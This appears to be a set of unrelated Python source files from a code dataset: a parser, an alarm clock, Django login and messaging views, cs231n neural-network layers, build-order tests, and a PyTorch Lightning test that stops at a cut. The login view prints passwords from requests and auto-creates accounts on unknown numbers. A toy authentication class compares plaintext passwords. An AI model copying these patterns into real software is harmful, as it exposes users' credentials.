def nextIsKeyword(tokens, keyword):
    """True when the next token is an identifier spelling 'keyword'."""
    if len(tokens) == 0:
        return False
    token = tokens.peekNext()
    return isinstance(token, IdentifierToken) and token.value == keyword
def nextIsLetter(tokens, letter):
    """True when the next token is the single character 'letter'."""
    if len(tokens) == 0:
        return False
    token = tokens.peekNext()
    return isinstance(token, SingleCharToken) and token.value == letter
def nextIsOneOfLetters(tokens, *letters):
    # True when the next token matches any of the candidate characters.
    for ch in letters:
        if nextIsLetter(tokens, ch):
            return True
    return False
def nextLettersAre(tokens, letters):
    """True when the upcoming tokens spell out 'letters' exactly."""
    if len(tokens) < len(letters):
        return False
    lookahead = tokens.getLookahead(len(letters))
    return all(
        isinstance(token, SingleCharToken) and token.value == ch
        for token, ch in zip(lookahead, letters)
    )
def nextIsIdentifier(tokens):
    # Non-empty stream whose head is an identifier token.
    return len(tokens) > 0 and isinstance(tokens.peekNext(), IdentifierToken)
def nextIsInteger(tokens):
    # Non-empty stream whose head is an integer token.
    return len(tokens) > 0 and isinstance(tokens.peekNext(), IntegerToken)
def nextIsComparisonOperator(tokens):
    # True when any known operator spelling matches the upcoming tokens.
    for op in comparisonOperators:
        if nextLettersAre(tokens, op):
            return True
    return False
"mail@jlucke.com"
] | mail@jlucke.com |
643a7b2091b878e7481a7ba0950e51a72cd4a379 | 6a4abacf7005bc4c24e0719b72106415e7e9b905 | /alarm_clock.py | db2bb0abfda575ae2a0c75f163065765dd320983 | [] | no_license | saikarthik007/Alarm-Clock | 342415c60e7b50cff39c36fe254e9cf30deda8c2 | a95fb1745720a73cd67333efdec204e720d4b0ea | refs/heads/main | 2023-06-25T19:25:22.457016 | 2021-08-03T09:56:52 | 2021-08-03T09:56:52 | 392,268,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,748 | py | """
Application to set alarm based on date and time
Developed by : Karthik C
"""
import time
from datetime import datetime
from playsound import playsound
class AlarmClock:
    """Alarm that fires once the wall clock reaches a user-supplied moment."""
    # Formats the user is asked to type the alarm in.
    _DATE_FORMAT = "%d/%m/%Y"
    _TIME_FORMAT = "%H:%M:%S"
    def __init__(self, alarm_date, alarm_time):
        """Store the target date ('DD/MM/YYYY') and time ('HH:MM:SS')."""
        self.alarm_time = alarm_time
        self.alarm_date = alarm_date
    def set_alarm(self):
        """Poll once per second and play the alarm sound at the target moment."""
        while True:
            time.sleep(1)
            current_time = datetime.now()
            now = current_time.strftime(self._TIME_FORMAT)
            date = current_time.strftime(self._DATE_FORMAT)
            if date == self.alarm_date and now == self.alarm_time:
                print("Time to Wake up")
                playsound('alarm.mp3')
                break
    def verify_user_input(self):
        """Start the alarm unless the requested moment is malformed or past.

        BUG fix: the original compared the 'DD/MM/YYYY' / 'HH:MM:SS'
        strings lexicographically, which mis-orders dates across month
        and year boundaries, and rejected any future-date alarm whose
        time of day was earlier than the current time.  Parse and
        compare real datetimes instead.
        """
        try:
            target = datetime.strptime(
                self.alarm_date + " " + self.alarm_time,
                self._DATE_FORMAT + " " + self._TIME_FORMAT,
            )
        except ValueError:
            # New explicit branch: malformed input previously fell
            # through to meaningless string comparisons.
            print("Invalid date/time format, cant set alarm!")
            return
        now = datetime.now()
        if target.date() < now.date():
            print("Entered date is in past cant set alarm!")
        elif target < now:
            # Same calendar day, but the requested moment already passed.
            print("Entered time is in past cant set alarm!")
        else:
            print("Setting up alarm...")
            self.set_alarm()
if __name__ == "__main__":
    # Collect the target date and time interactively, then validate them;
    # validation starts the alarm loop when the input is acceptable.
    alarm_day = input("Enter the date to set alarm : DD/MM/YYYY\n")
    alarm_time = input("Enter the time to set alarm : HH:MM:SS\n")
    AlarmClock(alarm_day, alarm_time).verify_user_input()
| [
"noreply@github.com"
] | noreply@github.com |
3187010c119673201a32665997e3af25e74ff962 | c4caf34cfdbce7a843c5be6b8776334015fac9bd | /v1/views.py | 173a484d0192c4b0e0bdeb8cfa26d120a0194f06 | [] | no_license | DanielVisca/Thinking-of-You-Server | 9c84c23adc5cb693643ceaa249d6704fb93a1f47 | 14834c49467e54ae9d1727a5cf15344e5bf9b3df | refs/heads/master | 2022-04-23T01:15:32.199666 | 2020-04-14T00:40:24 | 2020-04-14T00:40:24 | 255,435,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,877 | py | from django.http import HttpResponse, JsonResponse
from v1.models import *
from rest_framework.decorators import api_view
from rest_framework.decorators import parser_classes
from rest_framework.parsers import JSONParser
from django.shortcuts import render
from django.core.exceptions import ObjectDoesNotExist
import json
import server.secure as secure
import requests
# Security
from django.contrib.auth.hashers import make_password, check_password
from secrets import token_urlsafe
# Create your views here.
@api_view(['post'])
@parser_classes([JSONParser])
def send_toy(request):
    """Record a 'Thinking of You' ping from the authenticated sender.

    Expects the sender's auth token in the 'key' request header and the
    receiver's phone number in the JSON body under
    'send_to_phone_number'.  Returns {'success': True} or a 400 when
    either user cannot be found.
    """
    # BUG fix: HttpRequest has no 'header' attribute, and headers are a
    # mapping rather than a JSON document -- read the token from the
    # case-insensitive headers mapping instead of json.loads(request.header).
    auth_token = request.headers.get('key')
    request_body = json.loads(request.body)
    send_to_id = request_body["send_to_phone_number"]
    try:
        receiver = User.objects.get(phone_number=send_to_id)
        sender = User.objects.get(auth_token=auth_token)
        # Create a 'Thinking of You' object linking sender to receiver.
        TOY.objects.create(
            sender=sender,
            receiver=receiver,
        )
    except ObjectDoesNotExist:
        return JsonResponse(status=400, data={'success': False, 'msg': 'send failure'})
    return JsonResponse({'success': True})
@api_view(['post'])
@parser_classes([JSONParser])
def init(request):
    """
    Log a user in (creating the account on first login -- see
    user_authenticate).  On success the user is marked active and
    receives a fresh auth token; bad JSON yields 400, bad credentials
    or any unexpected failure yields 401.
    """
    try:
        payload = json.loads(request.body)
        print("request: " + str(payload))
        user_phone_number = payload['phone_number']
        user_password = payload['password']
        # user_authenticate returns the user instance on success, or
        # None when the password does not match.
        user = user_authenticate(user_phone_number, user_password)
        if user is None:
            # BUG fix: the old code fell back to a *plaintext* password
            # DB lookup after a failed authentication, defeating the
            # password hashing entirely.  Deny instead.
            print("Authentication failed")
            return JsonResponse(status=401, data={'success': False})
        print("authentication worked")
        # Mark the user active and rotate their auth token.
        user.active = True
        user.auth_token = token_urlsafe(64)
        user.save()
        return JsonResponse(data={
            'success': True,
            'user_auth_token': user.auth_token
        })
    except json.JSONDecodeError:
        # Invalid JSON body.
        return JsonResponse(status=400, data={'success': False})
    except KeyError:
        # Missing 'phone_number' or 'password' field.
        return JsonResponse(status=400, data={'success': False})
    except Exception as e:  # e.g. django.core.exceptions.ObjectDoesNotExist
        print(e)
        return JsonResponse(status=401, data={'success': False})
# Helper Functions
def user_authenticate(user_phone_number=None, password=None, first_name=None, last_name=None, phone_number=None, username=None):
    """
    Return the User matching the phone number, creating the account
    (with a hashed password) on first login.  Returns None when the
    password does not match the stored hash.
    """
    try:
        user = User.objects.get(phone_number=user_phone_number)
    except ObjectDoesNotExist:
        # First login: create the account with a hashed password.
        # (Narrowed from a bare 'except', which also swallowed real bugs.)
        hashed_pwd = make_password(password)
        user = User.objects.create(phone_number=user_phone_number, password=hashed_pwd)
        print("User: " + str(user))
        return user
    # BUG fix: the old code read User.password (the *class* attribute)
    # instead of the instance's stored hash, and returned the User class
    # rather than the instance on success.
    if check_password(password, user.password):
        return user
    print("wrong password")
    return None
"danielvisca96@gmail.com"
] | danielvisca96@gmail.com |
98a42ed886c33115fee8f67642016d2738ab1d25 | d60be98f0b9b81249cc2c565796062b4a1c32197 | /bank/AuthenticationService.py | 3cb578a7e9921d4ffeb253cb0a15b0cfc425715e | [] | no_license | softchris/katas | 5a667547a32b5ea7135263d5e22774516f104ac5 | 946c0a514a528a40dc937f8d92ccc173eee58c0e | refs/heads/master | 2021-01-01T05:48:34.932361 | 2013-07-26T18:31:41 | 2013-07-26T18:31:41 | 11,687,335 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 522 | py | import User
class AuthenticationService:
    """In-memory username/password authentication over a list of users."""
    def __init__(self):
        # BUG fix: 'self.isAuthenticated' was read before ever being
        # assigned, raising AttributeError on construction.
        self.isAuthenticated = False
        self.user = None
        self.users = []
    def initUsers(self):
        """Seed the service with a default demo user."""
        user = User.User("pelle", "persson")
        # BUG fix: Python lists have append(), not push().
        self.users.append(user)
    def login(self, username, password):
        """Mark the service authenticated when the credentials match a user.

        BUG fix: the old signature was (user, self, username, password),
        which bound the instance to 'user' and shifted every argument.
        """
        for user in self.users:
            if user.username == username and user.password == password:
                self.isAuthenticated = True
    def getUser(self, username):
        """Return the user with the given username, or None when absent."""
        for user in self.users:
            if user.username == username:
                return user
        return None
"christoffer.noring@softhouse.se"
] | christoffer.noring@softhouse.se |
ad8c19923c52f03b06c8c3c8ad57650d961ed9e0 | ccddedd15256742713ed8298f50fbd9f29238d38 | /Misc/video_capture.py | e25bbc2ca7b0b7accc43aa58470706e13027423e | [] | no_license | roshankr/DS_Competition | d9c27915eddfa0b39b20445882442b15975d6e5e | c765172f1f673fd3c774a4c3b45f61e41e7e5e52 | refs/heads/master | 2021-01-10T04:26:24.417215 | 2019-01-02T21:02:39 | 2019-01-02T21:02:39 | 44,562,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | #!/usr/bin/python
import platform
import sys
import os
import pickle
import time as tm
import pandas as pd
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import SVC
from sklearn.linear_model import SGDClassifier
from datetime import datetime, timedelta
import numpy as np
import cv2
import xgboost
def videocapture():
    """Read every frame of 'FlickAnimation.avi' (located via the global
    file_path) into memory, then display the buffered frames as grayscale
    windows once reading stops.

    NOTE(review): the outer while-loop never exits -- after cap.read()
    stops returning frames, the else-branch re-displays the buffered
    frames on every iteration, and the capture handle is never released
    (the release/destroy calls are commented out below).  Confirm this
    is intentional demo behaviour.
    """
    filename = os.path.join(file_path, 'FlickAnimation.avi')
    cap = cv2.VideoCapture(filename)
    # Buffer of raw BGR frames read from the video.
    X_test = []
    while (True):
        # Capture frame-by-frame
        ret, frame = cap.read()
        if ret:
            # Our operations on the frame come here
            #frame = frame*(1. / 255)
            X_test.append(frame)
            #gray = cv2.cvtColor(frame, cv2.COLOR_BGR2Luv)
            # Grayscale conversion; the result is unused in this branch.
            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
            # Display the resulting frame
            #cv2.imshow('frame', gray)
            #tm.sleep(6)
            #sys.exit(0)
            #if cv2.waitKey(1) & 0xFF == ord('q'):
            # break
        else:
            # End of stream: show each buffered frame in its own window.
            i= 0
            for img in X_test:
                gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
                cv2.imshow('frame'+str(i), gray)
                i = i +1
                if cv2.waitKey(1) & 0xFF == ord('q'):
                    break
            #tm.sleep(60)
            #break
    # When everything done, release the capture
    #cap.release()
    #cv2.destroyAllWindows()
if __name__ == "__main__":
    global file_path
    # Announce start, resolve the platform-specific data directory used by
    # videocapture() via the module-level file_path, then run the capture.
    print("video capturing....... at Time: %s" % (tm.strftime("%H:%M:%S")))
    file_path = ('C:\\Python\\Others\\data\\test'
                 if platform.system() == "Windows"
                 else '/mnt/hgfs/Python/Others/data/test/')
    videocapture()
    print("--------------- END train.")
| [
"roshankr@gmail.com"
] | roshankr@gmail.com |
84a53172ac55cc0fb355a96df27090c3e5ccdad8 | 2f3991446af4dff47d9bbc6192c92af45efe88c2 | /level3-dependencies/test_build_order_private.py | 55afb702d106863bfe83993eb3e7addc55c75430 | [] | no_license | fedora-python/pyconcz-challenge | e3b2fc6ab9caebe9c3f55b6f89d9aea7481f8429 | f3b038fe1eb4d76d2e99f0e32a34a3f7716a2670 | refs/heads/master | 2022-11-17T01:16:01.307190 | 2022-10-31T10:25:02 | 2022-10-31T10:25:02 | 93,522,072 | 3 | 6 | null | 2022-10-31T10:25:03 | 2017-06-06T13:33:01 | Python | UTF-8 | Python | false | false | 1,565 | py | import pytest
def is_valid_result(pkgs, result):
    """Check that 'result' is a legal build order for the graph 'pkgs'.

    A legal order builds each package exactly once, only after all of its
    dependencies, and covers every package.  Prints the first violation
    found and returns False; returns True for a fully valid order.
    """
    done = dict.fromkeys(pkgs, False)
    for name in result:
        if name not in done:
            print(f'{name} was not supposed to be built at all')
            return False
        if done[name]:
            print(f'{name} already built')
            return False
        unmet = [dep for dep in pkgs[name] if not done[dep]]
        if unmet:
            print(f'{name} needs {unmet[0]} but that was not yet built')
            return False
        done[name] = True
    for name, was_built in done.items():
        if not was_built:
            print(f'{name} not built at the end')
            return False
    return True
# Dependency graphs for which at least one valid build order exists.
# Each dict maps a package name to the list of packages it depends on.
VALIDS = [
    {
        'a': ['b', 'c', 'd'],
        'b': ['d'],
        'c': ['d'],
        'd': [],
    },
    {
        'a': [],
        'b': [],
        'c': [],
        'd': [],
        'e': ['f'],
        'f': [],
        'g': [],
    },
    {
        '.': [],
        'a': ['.'],
        'b': ['.', 'a'],
        'c': ['.', 'a', 'b'],
        'd': ['.', 'a', 'b', 'c'],
    },
    {
        '.': [],
    },
]
# Graphs with a self-dependency, a missing package, or a cycle: no valid
# build order exists, so build_order() is expected to raise ValueError.
INVALIDS = [
    {
        'a': ['a'],
    },
    {
        'a': ['nonexistent'],
    },
    {
        'a': ['b'],
        'b': ['c'],
        'c': ['d'],
        'd': ['a'],
    },
]
@pytest.mark.parametrize('pkgs', VALIDS)
def test_valids(module, pkgs):
    # The order returned by the solution module's build_order() must build
    # every package exactly once, dependencies first.
    assert is_valid_result(pkgs, module.build_order(pkgs))
@pytest.mark.parametrize('pkgs', INVALIDS)
def test_invalids(module, pkgs):
    # Unsatisfiable graphs (self-deps, missing deps, cycles) must be
    # rejected with a ValueError.
    with pytest.raises(ValueError):
        module.build_order(pkgs)
| [
"lbalhar@redhat.com"
] | lbalhar@redhat.com |
f8128fff9d6839dfb0a004533a916b2972314baa | 2111790241a7fb0501fc1561c040d4147795013c | /libs/drf_auth/drf_auth/__init__.py | 8849f032d057925d80c04362a1438de4f3f7ba20 | [
"LicenseRef-scancode-unknown-license-reference",
"MulanPSL-1.0",
"LicenseRef-scancode-mulanpsl-1.0-en"
] | permissive | cnicgpaul123/killNCP | e67d6030bf8a5f3cb739de9c1e5c02e65b688efb | aa153919389784354d1efa0c9669393a7ffe7cf7 | refs/heads/master | 2022-12-12T10:31:32.696763 | 2020-02-24T06:35:55 | 2020-02-24T06:35:55 | 242,639,784 | 6 | 0 | NOASSERTION | 2022-12-08T05:26:34 | 2020-02-24T03:39:51 | Python | UTF-8 | Python | false | false | 548 | py | # -*- coding: utf-8 -*-
"""
Licensed under the MIT License (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
# Single-source package version string (read by packaging/tooling).
__version__ = "1.0.1"
| [
""
] | |
154873806933fc5055c4498b02af97faca74ccf3 | e0c6c2a5e87c51d84add566c2410bf2dcbd7bc42 | /cs231n/classifiers/fc_net.py | a38254c51cd959c26049e5e48638391f1cfa8590 | [] | no_license | aashish2894/cifar10_convnet | b1f5042f4a878d4a4f8bacabad767f8c96a10d0c | 1df93036c5ae59ab5bdf0591498b46d2090e845f | refs/heads/master | 2021-10-02T18:30:18.613270 | 2018-11-30T03:27:05 | 2018-11-30T03:27:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,670 | py | from builtins import range
from builtins import object
import numpy as np
from cs231n.layers import *
from cs231n.layer_utils import *
class TwoLayerNet(object):
    """
    A two-layer fully-connected neural network with ReLU nonlinearity and
    softmax loss that uses a modular layer design. We assume an input dimension
    of D, a hidden dimension of H, and perform classification over C classes.
    The architecture is affine - relu - affine - softmax.
    Note that this class does not implement gradient descent; instead, it
    will interact with a separate Solver object that is responsible for running
    optimization.
    The learnable parameters of the model are stored in the dictionary
    self.params that maps parameter names to numpy arrays.
    """
    def __init__(self, input_dim=3*32*32, hidden_dim=100, num_classes=10,
                 weight_scale=1e-3, reg=0.0):
        """
        Initialize a new network.
        Inputs:
        - input_dim: An integer giving the size of the input
        - hidden_dim: An integer giving the size of the hidden layer
        - num_classes: An integer giving the number of classes to classify
        - dropout: Scalar between 0 and 1 giving dropout strength.
        - weight_scale: Scalar giving the standard deviation for random
          initialization of the weights.
        - reg: Scalar giving L2 regularization strength.
        """
        self.params = {}
        self.reg = reg
        ############################################################################
        # TODO: Initialize the weights and biases of the two-layer net. Weights    #
        # should be initialized from a Gaussian with standard deviation equal to   #
        # weight_scale, and biases should be initialized to zero. All weights and  #
        # biases should be stored in the dictionary self.params, with first layer  #
        # weights and biases using the keys 'W1' and 'b1' and second layer weights #
        # and biases using the keys 'W2' and 'b2'.                                 #
        ############################################################################
        # Layer 1: (input_dim, hidden_dim); Layer 2: (hidden_dim, num_classes).
        # Gaussian init scaled by weight_scale, zero biases.
        self.params['W1'] = weight_scale * np.random.randn(input_dim, hidden_dim)
        self.params['b1'] = np.zeros(hidden_dim)
        self.params['W2'] = weight_scale * np.random.randn(hidden_dim, num_classes)
        self.params['b2'] = np.zeros(num_classes)
        ############################################################################
        #                             END OF YOUR CODE                             #
        ############################################################################
    def loss(self, X, y=None):
        """
        Compute loss and gradient for a minibatch of data.
        Inputs:
        - X: Array of input data of shape (N, d_1, ..., d_k)
        - y: Array of labels, of shape (N,). y[i] gives the label for X[i].
        Returns:
        If y is None, then run a test-time forward pass of the model and return:
        - scores: Array of shape (N, C) giving classification scores, where
          scores[i, c] is the classification score for X[i] and class c.
        If y is not None, then run a training-time forward and backward pass and
        return a tuple of:
        - loss: Scalar value giving the loss
        - grads: Dictionary with the same keys as self.params, mapping parameter
          names to gradients of the loss with respect to those parameters.
        """
        scores = None
        W1 = self.params['W1']
        b1 = self.params['b1']
        W2 = self.params['W2']
        b2 = self.params['b2']
        ############################################################################
        # TODO: Implement the forward pass for the two-layer net, computing the    #
        # class scores for X and storing them in the scores variable.              #
        ############################################################################
        # Forward pass: affine -> ReLU (hidden layer), then affine (scores).
        # Caches are kept for the backward pass.
        a, fc_cache = affine_forward(X, W1, b1)
        out_hidden, relu_cache = relu_forward(a)
        cache_hidden_layer = (fc_cache, relu_cache)
        scores, out_cache = affine_forward(out_hidden, W2, b2)
        ############################################################################
        #                             END OF YOUR CODE                             #
        ############################################################################
        # If y is None then we are in test mode so just return scores
        if y is None:
            return scores
        loss, grads = 0, {}
        ############################################################################
        # TODO: Implement the backward pass for the two-layer net. Store the loss  #
        # in the loss variable and gradients in the grads dictionary. Compute data #
        # loss using softmax, and make sure that grads[k] holds the gradients for  #
        # self.params[k]. Don't forget to add L2 regularization!                   #
        #                                                                          #
        # NOTE: To ensure that your implementation matches ours and you pass the   #
        # automated tests, make sure that your L2 regularization includes a factor #
        # of 0.5 to simplify the expression for the gradient.                      #
        ############################################################################
        # Softmax data loss plus 0.5 * reg * ||W||^2 for each weight matrix.
        loss, dscores = softmax_loss(scores,y)
        loss = loss + 0.5*self.reg*np.sum(W1*W1) + 0.5*self.reg*np.sum(W2*W2)
        # Backprop through the second affine, then the hidden affine-ReLU.
        dx1, dW2, db2 = affine_backward(dscores, out_cache)
        dx, dW1, db1 = affine_relu_backward(dx1, cache_hidden_layer)
        # Add the L2 regularization gradient contribution.
        dW1 = dW1 + self.reg*W1
        dW2 = dW2 + self.reg*W2
        grads['W1'] = dW1
        grads['b1'] = db1
        grads['W2'] = dW2
        grads['b2'] = db2
        ############################################################################
        #                             END OF YOUR CODE                             #
        ############################################################################
        return loss, grads
class FullyConnectedNet(object):
    """
    A fully-connected neural network with an arbitrary number of hidden layers,
    ReLU nonlinearities, and a softmax loss function. This will also implement
    dropout and batch normalization as options. For a network with L layers,
    the architecture will be
    {affine - [batch norm] - relu - [dropout]} x (L - 1) - affine - softmax
    where batch normalization and dropout are optional, and the {...} block is
    repeated L - 1 times.
    Similar to the TwoLayerNet above, learnable parameters are stored in the
    self.params dictionary and will be learned using the Solver class.
    """
    def __init__(self, hidden_dims, input_dim=3*32*32, num_classes=10,
                 dropout=0, use_batchnorm=False, reg=0.0,
                 weight_scale=1e-2, dtype=np.float32, seed=None):
        """
        Initialize a new FullyConnectedNet.
        Inputs:
        - hidden_dims: A list of integers giving the size of each hidden layer.
        - input_dim: An integer giving the size of the input.
        - num_classes: An integer giving the number of classes to classify.
        - dropout: Scalar between 0 and 1 giving dropout strength. If dropout=0 then
          the network should not use dropout at all.
        - use_batchnorm: Whether or not the network should use batch normalization.
        - reg: Scalar giving L2 regularization strength.
        - weight_scale: Scalar giving the standard deviation for random
          initialization of the weights.
        - dtype: A numpy datatype object; all computations will be performed using
          this datatype. float32 is faster but less accurate, so you should use
          float64 for numeric gradient checking.
        - seed: If not None, then pass this random seed to the dropout layers. This
          will make the dropout layers deteriminstic so we can gradient check the
          model.
        """
        self.use_batchnorm = use_batchnorm
        self.use_dropout = dropout > 0
        self.reg = reg
        self.num_layers = 1 + len(hidden_dims)
        self.dtype = dtype
        self.params = {}
        ############################################################################
        # TODO: Initialize the parameters of the network, storing all values in    #
        # the self.params dictionary. Store weights and biases for the first layer #
        # in W1 and b1; for the second layer use W2 and b2, etc. Weights should be  #
        # initialized from a normal distribution with standard deviation equal to  #
        # weight_scale and biases should be initialized to zero.                   #
        #                                                                          #
        # When using batch normalization, store scale and shift parameters for the #
        # first layer in gamma1 and beta1; for the second layer use gamma2 and     #
        # beta2, etc. Scale parameters should be initialized to one and shift      #
        # parameters should be initialized to zero.                                #
        ############################################################################
        # dims[i] -> dims[i+1] gives the shape of layer (i+1)'s weight matrix.
        dims = [input_dim] + hidden_dims + [num_classes]
        for i in range(self.num_layers):
            self.params['b%d'%(i+1)] = np.zeros(dims[i+1])
            self.params['W%d'%(i+1)] = np.random.randn(dims[i],dims[i+1])*weight_scale
        if self.use_batchnorm:
            # No gamma/beta for the final (scores) layer: only L-1 batchnorms.
            for i in range(self.num_layers-1):
                self.params['gamma%d'%(i+1)] = np.ones(dims[i+1])
                self.params['beta%d'%(i+1)] = np.zeros(dims[i+1])
        ############################################################################
        #                             END OF YOUR CODE                             #
        ############################################################################
        # When using dropout we need to pass a dropout_param dictionary to each
        # dropout layer so that the layer knows the dropout probability and the mode
        # (train / test). You can pass the same dropout_param to each dropout layer.
        self.dropout_param = {}
        if self.use_dropout:
            self.dropout_param = {'mode': 'train', 'p': dropout}
            if seed is not None:
                self.dropout_param['seed'] = seed
        # With batch normalization we need to keep track of running means and
        # variances, so we need to pass a special bn_param object to each batch
        # normalization layer. You should pass self.bn_params[0] to the forward pass
        # of the first batch normalization layer, self.bn_params[1] to the forward
        # pass of the second batch normalization layer, etc.
        self.bn_params = []
        if self.use_batchnorm:
            self.bn_params = [{'mode': 'train'} for i in range(self.num_layers - 1)]
        # Cast all parameters to the correct datatype
        for k, v in self.params.items():
            self.params[k] = v.astype(dtype)
    def loss(self, X, y=None):
        """
        Compute loss and gradient for the fully-connected net.
        Input / output: Same as TwoLayerNet above.
        """
        X = X.astype(self.dtype)
        mode = 'test' if y is None else 'train'
        # Set train/test mode for batchnorm params and dropout param since they
        # behave differently during training and testing.
        if self.use_dropout:
            self.dropout_param['mode'] = mode
        if self.use_batchnorm:
            for bn_param in self.bn_params:
                bn_param['mode'] = mode
        scores = None
        ############################################################################
        # TODO: Implement the forward pass for the fully-connected net, computing  #
        # the class scores for X and storing them in the scores variable.          #
        #                                                                          #
        # When using dropout, you'll need to pass self.dropout_param to each       #
        # dropout forward pass.                                                    #
        #                                                                          #
        # When using batch normalization, you'll need to pass self.bn_params[0] to #
        # the forward pass for the first batch normalization layer, pass           #
        # self.bn_params[1] to the forward pass for the second batch normalization #
        # layer, etc.                                                              #
        ############################################################################
        # layer[i] holds the activations leaving layer i (layer[0] is the input);
        # cache_layer/dropout_cache keep what each layer needs for backprop.
        layer = {}
        layer[0] = X
        cache_layer = {}
        dropout_cache = {}
        #for i in range(1,self.num_layers):
        #    layer[i], cache_layer[i] = affine_relu_forward(layer[i-1],self.params['W%d' %i],self.params['b%d' %i])
        ## batch normaliztion
        for i in range(1,self.num_layers):
            if self.use_batchnorm:
                layer[i], cache_layer[i] = affine_norm_relu_forward(layer[i-1], self.params['W%d' %i], self.params['b%d' %i], self.params['gamma%d' %i], self.params['beta%d' %i], self.bn_params[i-1])
            else:
                layer[i], cache_layer[i] = affine_relu_forward(layer[i-1],self.params['W%d' %i],self.params['b%d' %i])
            if self.use_dropout:
                layer[i], dropout_cache[i] = dropout_forward(layer[i], self.dropout_param)
        # last layer
        # Final layer is a plain affine (no ReLU / batchnorm / dropout).
        Wlast = 'W%d' %self.num_layers
        blast = 'b%d' %self.num_layers
        scores, cache_scores = affine_forward(layer[self.num_layers-1],self.params[Wlast],self.params[blast])
        ############################################################################
        #                             END OF YOUR CODE                             #
        ############################################################################
        # If test mode return early
        if mode == 'test':
            return scores
        loss, grads = 0.0, {}
        ############################################################################
        # TODO: Implement the backward pass for the fully-connected net. Store the #
        # loss in the loss variable and gradients in the grads dictionary. Compute #
        # data loss using softmax, and make sure that grads[k] holds the gradients #
        # for self.params[k]. Don't forget to add L2 regularization!               #
        #                                                                          #
        # When using batch normalization, you don't need to regularize the scale   #
        # and shift parameters.                                                    #
        #                                                                          #
        # NOTE: To ensure that your implementation matches ours and you pass the   #
        # automated tests, make sure that your L2 regularization includes a factor #
        # of 0.5 to simplify the expression for the gradient.                      #
        ############################################################################
        # Softmax data loss plus 0.5 * reg * ||W_i||^2 for every weight matrix.
        loss, dscores = softmax_loss(scores,y)
        for i in range(1,self.num_layers+1):
            loss = loss + 0.5*self.reg*np.sum(self.params['W%d' %i]*self.params['W%d' %i])
        # Backward pass: last affine first, then hidden layers in reverse,
        # undoing dropout before each affine-(norm-)ReLU block.
        dx = {}
        dx[self.num_layers], grads[Wlast], grads[blast]=affine_backward(dscores,cache_scores)
        grads[Wlast] += self.reg*self.params[Wlast]
        for i in reversed(range(1,self.num_layers)):
            if self.use_dropout:
                dx[i+1] = dropout_backward(dx[i+1], dropout_cache[i])
            if self.use_batchnorm:
                dx[i], grads['W%d' %i], grads['b%d' %i], grads['gamma%d' %i], grads['beta%d' %i] = affine_norm_relu_backward(dx[i+1],cache_layer[i])
                grads['W%d' %i] += self.reg*self.params['W%d' %i]
            else:
                dx[i], grads['W%d' %i], grads['b%d' %i] = affine_relu_backward(dx[i+1],cache_layer[i])
                grads['W%d' %i] += self.reg*self.params['W%d' %i]
        ## Batch normalization
        ############################################################################
        #                             END OF YOUR CODE                             #
        ############################################################################
        return loss, grads
def affine_norm_relu_forward(x, w, b, gamma, beta, bn_param):
    """Convenience layer: affine -> batch norm -> ReLU.

    Inputs:
    - x: Input to the affine layer
    - w, b: Weights for the affine layer
    - gamma, beta: Scale/shift parameters for batch normalization
    - bn_param: Batch-norm bookkeeping (mode, running mean/var)
    Returns a tuple of:
    - out: Output from the ReLU
    - cache: (affine, batchnorm, relu) caches for the backward pass
    """
    affine_out, affine_cache = affine_forward(x, w, b)
    bn_out, bn_cache = batchnorm_forward(affine_out, gamma, beta, bn_param)
    out, relu_cache = relu_forward(bn_out)
    return out, (affine_cache, bn_cache, relu_cache)
def affine_norm_relu_backward(dout, cache):
    """Backward pass for the affine -> batch norm -> ReLU convenience layer."""
    affine_cache, bn_cache, relu_cache = cache
    # Undo the layers in reverse order: ReLU, then batchnorm, then affine.
    d_relu = relu_backward(dout, relu_cache)
    d_bn, dgamma, dbeta = batchnorm_backward_alt(d_relu, bn_cache)
    dx, dw, db = affine_backward(d_bn, affine_cache)
    return dx, dw, db, dgamma, dbeta
| [
"anshu.2894@gmail.com"
] | anshu.2894@gmail.com |
96e37d7f2ee89bdab87e242f7b8a2d08be5778a4 | d853a0103622cc3b3ada632b9c33c131bdad3a2d | /tests/callbacks/test_stochastic_weight_avg.py | e10f99d33d564dd5019c7a7af229d2aa2ee1fb51 | [
"Apache-2.0"
] | permissive | acharjee07/pytorch-lightning | aad24f872dbfd815585fa7cf2b6594ebe27eb2b1 | 2ee3127661493ba5d0513e543a78b6596f0a216b | refs/heads/master | 2023-09-05T20:58:44.829610 | 2021-10-25T17:33:52 | 2021-10-25T17:33:52 | 421,125,136 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,883 | py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from unittest import mock
import pytest
import torch
from torch import nn
from torch.optim.swa_utils import SWALR
from torch.utils.data import DataLoader
from pytorch_lightning import LightningModule, Trainer
from pytorch_lightning.accelerators import Accelerator
from pytorch_lightning.callbacks import StochasticWeightAveraging
from pytorch_lightning.plugins import DDPSpawnPlugin
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from tests.helpers.boring_model import BoringModel, RandomDataset, RandomIterableDataset
from tests.helpers.runif import RunIf
class SwaTestModel(BoringModel):
    # Minimal LightningModule used to exercise StochasticWeightAveraging:
    # an optional BatchNorm layer (SWA must run the extra BN-update epoch),
    # a configurable scheduler interval, and an optional iterable dataset.
    def __init__(self, batchnorm: bool = True, interval: str = "epoch", iterable_dataset: bool = False):
        super().__init__()
        layers = [nn.Linear(32, 32)]
